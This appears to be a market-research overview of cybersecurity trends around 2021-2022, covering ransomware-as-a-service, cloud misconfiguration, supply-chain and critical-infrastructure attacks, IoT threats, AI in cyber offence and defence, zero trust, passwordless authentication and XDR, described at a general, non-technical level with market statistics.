Cyberattacks are frequent and increasingly complex, perpetrated by those furthering a geopolitical cause or attackers intent on making money. In 2021, the average number of cyberattacks and data breaches increased by 15.1% from the previous year. Homeworking, the ongoing digitization of society, and the increasingly online nature of our lives mean opportunities about for phishers, hackers, scammers, and extortionists.
Maintaining the security of IT systems is a constant struggle for organisations of all types. In 2021, enterprises invested more in cybersecurity and cloud architecture due to employees working remotely during the pandemic. The global cyber security market size was valued at USD 184.93 billion in 2021 and is expected to expand at a compound annual growth rate (CAGR) of 12.0% from 2022 to 2030. This also sparked a meggers and acquisitions (M&A) boom in the tech sector.
The increasing number of cyber-attacks with the emergence of e-commerce platforms, deployment of cloud solutions, and proliferation of smart devices are some factors driving the market growth. Cyber threats are anticipated to evolve with the increase in usage of devices with intelligent and IoT technologies.
GlobalData has identified key technology trends impacting cybersecurity.
According to the UK National Cyber Security Centre, there were three times as many ransomware attacks in the first quarter of 2021 as there were in the whole of 2019. ENISA has described the threat picture as the “golden era of ransomware”—partly due to attackers’ multiple monetisation options. Ransomware is a multi-faceted offensive campaign that also involves an attack on the brand reputation of the victim. Attackers are now operating secondary monetisation channels, auctioning exfiltrated data on the dark web.
A Cybereason survey found that 35% of businesses that paid a ransom demand paid between $30,000 and $1.4m, while 7% paid ransoms exceeding $1.4m. About 25% of organisations reported that a ransomware attack had forced them to close down operations for some time.
Ransomware as a service (RaaS)
Ransomware as a service (RaaS) has become an established industry within the ransomware business. Operators will lease out or offer subscriptions to their malware creations for a price.
Ransomware as a Service (RaaS) is a business model between ransomware operators and affiliates in which affiliates pay to launch ransomware attacks developed by operators. The most sophisticated RaaS operators offer portals that let their subscribers see the status of infections, total payments, total files encrypted and other information about their targets. An affiliate can simply log into the RaaS portal, create an account, pay with Bitcoin, enters detailson the type of malware they wish to create and click the submit button.
RaaS is business, and it’s big business: total ransomware revenues in 2020 were around $20 billion, up from $11.5 billion the previous year. The lucrative nature of RaaS and the difficulty of tracking down and prosecuting operators suggest that this business model will continue to flourish in 2022.
The cloud security segment is expected to exhibit the highest growth in the forecast period owing to the increasing adoption of cloud-based solutions by enterprises due to its cost-effectiveness and the convenience of working with cloud-based platforms.
However, cloud-based platforms are always vulnerable to data breaches and cyber-attacks. In the absence of strong security measures, cyber attackers can target the misconfigurations of security settings to steal cloud data. A March 2022 ‘Cloud Security Report’ from Check Point Software, based on a survey of 775 cyber security professionals, revealed that cloud security incidents were up 10% from the previous year, with 27% of organisations citing misconfiguration, ahead of issues like exposed data or account compromise.
Cloud misconfiguration is typically caused by a lack of awareness of cloud security and policies; inadequate controls and oversight; too many cloud application programming interfaces (APIs) and interfaces to adequately govern the system; and negligent insider behaviour.
The growing risk of unauthorized access and the increasing number of threat actors across cloud layers coupled with the increasing malware infiltrations is expected to compel enterprises to adopt cloud security solutions. Further, with growing web traffic to access media content, the need for filtering this traffic is expected to drive the segment growth.
Convergence of security technology solutions
Secure access service edge (SASE) first emerged in 2019 as a cloud-based IT model that converges a range of previously separate security and networking functions into a single architecture that applies zero-trust principles to how access to data is managed. But SASE is in danger of being superseded by a new model, security service edge (SSE), which typically incorporates the security half of SASE and consists of secure web gateways, cloud access security brokers (CASB), and zero-trust network access (ZTNA).
The bottom line is that security technology convergence is accelerating, driven by a need to reduce complexity, cut administration overheads, and increase effectiveness.
Protecting chips from cyberattacks is becoming a necessity as chips end up in mission-critical servers and in leading-edge, safety-critical applications. As systems vendors and original equipment manufacturers (OEMs) increasingly design their own chips, rather than buying commercially developed devices, they are creating their own ecosystems and are, therefore, making security requirements much more of a home-grown concern.
Macroeconomics is a key driver. The discovery in 2017 of high-profile security vulnerabilities—notably Meltdown and Spectre—meant chip vendors had to patch their security holes with software. That meant that customers, who had upgraded their servers to make the most of new processors, then lost much of their performance improvement. That, in turn, forced them to add more servers to process the same volume of data in the same amount of time.
Supply chain threats
Intellectual property (IP) is the lifeblood of today’s globally integrated microelectronics supply chain. Protecting confidential information is vital to electronics companies around the world. Yet the supply chain is fraught with security risks. Malicious actors never rest in their work to infiltrate factory systems or human resources databases with the intent to steal IP, disrupt production or embed malicious software that can open the door to future attacks.
Cyberattacks targeting software supply chains are increasingly common and typically devastating. They came to the fore in 2020 when Russian hackers broke into SolarWinds’ systems and added malicious code to the company’s software system.
While thousands downloaded the malware, SolarWinds announced “the actual number of customers who were hacked through SUNBURST to be fewer than 100.” This number is consistent with estimates previously released by the White House.
These attacks are effective because they can take down an organisation’s entire software supply chain and services, resulting in massive business disruption. Organizations can evaluate their attack surface and develop systems and infrastructure to defend against threats and manage vulnerabilities.
Critical national infrastructure (CNI) threats
Cyber threats against CNI are increasing, and governments are taking steps to recognise them. The 7 May 2021 attack on the Colonial Pipeline fuel facility in the US alerted governments worldwide to the risks such an attack can bring to CNI.
In Australia, the list of regulated CNI sectors has expanded to include higher education and research, communications, banking and finance, data, defence, energy, food and grocery, healthcare, space technology, transport, and water and sewerage. This formal expansion of CNI coverage will become a global trend as governments address cyber risks.
CNI organisations are increasing anti-ransomware precautions, mandating multi-factor authentication for remote access and admin accounts, locking down and monitoring remote desktop protocol (RDP), and training employees to spot phishing attacks and other threats.
Internet of Things (IoT) threats
The number of connected devices – known as the internet of things (IoT) is forecast to reach 18 billion by 2022. One consequence of this is a hugely increased number of potential access points for cybercriminals looking to gain access to secure digital systems. The IoT has long been recognised as a specific threat – attacks that have been identified in the past include hackers using connected household appliances like fridges and kettles to get access to networks, and from there go on to access computers or phones where valuable data could be stored.
The growing concern around IoT device security includes the fact that threat actors can not only damage the network and software that support IoT devices but also the devices themselves. Furthermore, IoT device adoption is advancing at a rate faster than the processes and protocols that can provide secure, reliable connections.
Device mismanagement and misconfiguration are significant concerns. Security oversights, poor password hygiene, and overall device mismanagement are all issues that can weaken IT security.
An attacker can infect an IoT device with malware through an unprotected port or phishing scams and co-opt it into an IoT botnet used to initiate massive cyber attacks.
Artificial intelligence (AI) and Cyber
Cyber-attacks are continuously increasing and becoming more sophisticated, creating large financial and other damage. New generations of malware and cyber-attacks is also difficult to detect with conventional cybersecurity methods. AI is essential to information security. It can swiftly analyse millions of datasets and identify various cyber threats. But attackers can also use AI as a weapon to design and carry out attacks. AI can mimic trusted actors, copying their actions and language. Using AI means attackers can also spot vulnerabilities more quickly, such as a network without protection or a downed firewall.
Artificial intelligence (AI) and machine learning can be trained to find attacks, which are similar to known attacks. Next generation Adaptive Machine Learning (ML) algorithms can collect intelligence about new threats, attacks and breaches and learn from them. AI can also automate processes for detecting attacks and reacting to breaches. In future, AI/ML can make cyber security fully automated.
On the other hand, AI is assisting in Cybercrime and cyber warfare. AI can also find vulnerabilities that a human could not detect, as bots can use data from previous attacks to spot slight changes. Cybercriminals can use data collected from a specific user or other similar users to design an attack to work for a particular target. According to Symantec Cyber criminals are developing AI enabled cyber-attacks that will cause an explosion of network penetration, personal data theft, and an epidemic-level spread of intelligent viruses in the coming years.
As Nations are developing smart city infrastructure, they are also becoming more vulnerable to cyber-attacks. Advance threat actors can use AI systems to carry massive, distributed denial of service” (DDoS) attacks. These attacks will bypass traditional security tools and can cause mass disruption to the operations of the infrastructure.
Nation states and Militaries are developing AI based extreme cyber weapons including intelligent viruses to penetrate enemy networks. Again, we can see dual nature of AI, and AI vs AI as it being used both to build Autonomous Cyber Defense as well as AI- based extreme cyber weapons.
Although ransomware represents the biggest threat to organisations today, insider threats still pose a challenge as the job market shifts in the wake of the pandemic. With many employees changing jobs and companies trying to keep them by offering flexible working and vacation options, there is an increased risk of insider threat.
According to VMware, the number of employees leaving their jobs but potentially still having access to the corporate network or proprietary data has created a cybersecurity headache for IT and security teams.
The growing use of managed security services
The managed services segment is expected to register the highest growth rate of more than 10% over the forecast period. Managed security services (MSS) provision is growing. According to the UK government’s 2022 Cyber Security Breaches Survey, 40% of businesses and almost a third of charities (32%) use at least one managed service provider.
The high growth can be attributed to the increasing demand for outsourcing IT security services to monitor and maintain security solutions and actions. Managed services provide a cost-effective way without requiring internal teams to manage the company’s IT security workload. Further, managed service providers are entirely focused on observing threat patterns and enhancing security operations anticipated to mitigate cyber-attacks, thereby increasing the adoption of managed services.
The core of an MSS provider’s (MSSP) business is in providing round-the-clock security monitoring and incident response for an enterprise’s networks and endpoints. However, as enterprise networks grow and evolve, support for other platforms, such as cloud-based infrastructure, has become a critical component of MSSP’s security portfolio.
Using an MSSP is typically intended to augment or replace an organisation’s internal security team, while other services offered by providers include intrusion prevention systems (IPS), web content filtering, identity access management (IAM), privileged access management, vulnerability scanning, and threat intelligence.
New vulnerabilities are always coming to light, and they can be difficult to fix. One that emerged in December 2021, an obscure but frequently used piece of software called Log4j, is a prime example. The Log4Shell bug affected devices and applications running vulnerable versions of the Log4j Java library.
Officials at the US Cybersecurity and Infrastructure Security Agency (CISA) warned that hundreds of millions of enterprise and consumer devices were at risk if the bug was not patched.
Zero trust adoption
The zero-trust security model is emerging as a long-term solution for organisations to data breaches. It eliminates the concept of trust from an organisation’s network architecture. In a zero-trust world, only authorised individuals can access selected applications.
The underlying principle is that no implicit trust is granted to you as a user just because you are behind the corporate firewall. Zero trust recognises that trust is a vulnerability. Once on the network, users, including attackers, can move laterally and access or exfiltrate data.
An offensive approach to cyber defence
The increasing number of attacks against CNI has led to cyber authorities worldwide working more closely together. According to US Cyber Command, the US military plays a more offensive, aggressive role in combating digital threats. The UK now has a National Cyber Force, whose activities build on a previous National Offensive Cyber Program. France also has a cyber strategy with both defensive and offensive capabilities.
The end of passwords is a prediction that comes around every year, but some progress is finally being made. In 2021, Microsoft announced that its users would no longer need passwords to log in to their accounts. Instead, they could use the Microsoft Authenticator app, Windows Hello, a security key, or a verification code sent to their phone or email to access apps and services.
This will likely benefit users and the IT staff, providing more back-end options that support password-less multi-factor authentication (MFA). However, it is challenging for businesses to transition away from passwords completely. Successful deployment requires companies to invest in the right resources, training, and end-user communication systems.
Extended detection and response (XDR)
XDR is an emerging cybersecurity model that is growing in its adoption and driving mergers and acquisitions (M&A). XDR is a series of tools and datasets that provides extended visibility, analysis, and response across networks and clouds in addition to apps and endpoints. Normal endpoint security typically focuses on containing and removing threats on endpoints and workloads.
XDR is designed to extend those capabilities beyond endpoint security to encompass multiple security control points to detect threats faster using data collected across domains.